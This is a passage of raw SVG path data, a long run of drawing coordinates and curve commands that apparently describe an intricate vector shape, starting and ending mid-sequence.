24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c